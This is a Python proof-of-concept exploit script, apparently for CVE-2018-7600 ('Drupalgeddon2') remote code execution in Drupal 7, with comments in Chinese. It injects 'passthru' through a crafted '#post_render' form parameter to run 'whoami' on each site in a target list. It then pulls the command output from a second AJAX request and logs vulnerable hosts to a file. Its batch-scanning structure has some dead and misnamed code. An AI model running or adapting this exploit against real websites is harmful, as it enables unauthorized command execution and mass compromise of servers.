Drupal7 RCE

#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
# Author : Noth
# Time : 2023-7-30

import re
import requests
from multiprocessing import Pool, Manager

requests.packages.urllib3.disable_warnings()

def poc(target):
    get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#type]':'markup', 'name[#markup]': 'whoami'}
    post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
    try:
        r = requests.post(target, params=get_params, data=post_params, verify=False,allow_redirects=False,timeout=10)
        r.raise_for_status() # 檢查請求是否成功，如果不成功会抛出異常
        rule1 = re.compile(r'<input type="hidden" name="form_build_id" value="(.*?)" />')
        form_build_id = rule1.findall(r.text)
        if form_build_id:
            get_params = {'q':'file/ajax/name/#value/' + form_build_id[0]}
            post_params = {'form_build_id':form_build_id[0]}
            r = requests.post(target, params=get_params, data=post_params, verify=False,timeout=10)
            r.raise_for_status()  # 檢查請求是否成功，如果不成功会抛出異常
            rule2 = re.compile(r'(.*?)\[{"command":"settings","settings":.*?')
            parsed_result=rule2.findall(r.text.replace('\n','').replace(' ','').replace('\r','').replace('\t',''))
            if parsed_result and len(parsed_result[0])>0:
                result = "vulnerable target: " + target + "\n當前權限: " + parsed_result[0]
                print(result)
                sucess_list.append(result)
                return result
    except requests.exceptions.Timeout:
        print(f"URL {target} 請求超時，中止該 URL 測試")
    except requests.exceptions.RequestException as e:
        print(f"URL {target} 請求異常: {e}")

# 創建一個會話並設置連接池的大小
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=100, pool_maxsize=100)
session.mount('http://', adapter)

try:
    sucess_list = []
    with open('/home/kali/Desktop/PoC/CVE-2018-7600-Drupal7-RCE/target.txt') as file:
        url_list = file.readlines()
        for url in url_list:
           target_url = url.strip()
           print("測試 URL:",target_url)
           poc(target_url)
except FileNotFoundError:
    print('當前路徑找不到 target.txt')
except IOError:
    print('文件權限錯誤,無法讀取')

    # 使用 Manager 創建共享列表，用於存儲結果
    manager = Manager()
    success_list = manager.list()

    # 使用 multiprocessing.Pool 來並行處理URL列表
    with Pool(processes=4) as pool:  # 調整進程數量
        pool.map(poc, url_list)

if sucess_list:
    with open('/home/kali/Desktop/PoC/CVE-2018-7600-Drupal7-RCE/sucess.txt','w') as f:
        for result in sucess_list:
            f.write(result + '\n')